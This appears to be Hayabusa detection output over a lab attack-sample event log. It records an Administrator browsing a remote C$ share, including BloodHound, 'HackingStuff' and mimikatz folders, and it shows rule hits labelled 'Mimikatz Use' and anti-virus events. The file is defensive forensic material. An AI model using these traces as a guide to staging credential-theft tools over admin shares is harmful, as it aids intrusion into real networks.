10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share 
Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test\server : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\unzipper : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\es5 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\esnext : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src\schemes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\util-deprecate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share 
Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\voc : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\warning : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\wrappy : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\write-file-atomic : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
-2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Float : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Menu : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Modals : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer\Tabs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Spotlight : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Zoom : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\fonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\img : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.519 
+09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\HackingStuff : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\HackingStuff\logs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\mimikatz_trunk : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\mimikatz_trunk\Win32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 
23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\mimikatz_trunk\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Documents : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Saved Games : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\desktop.ini : IP Address: 
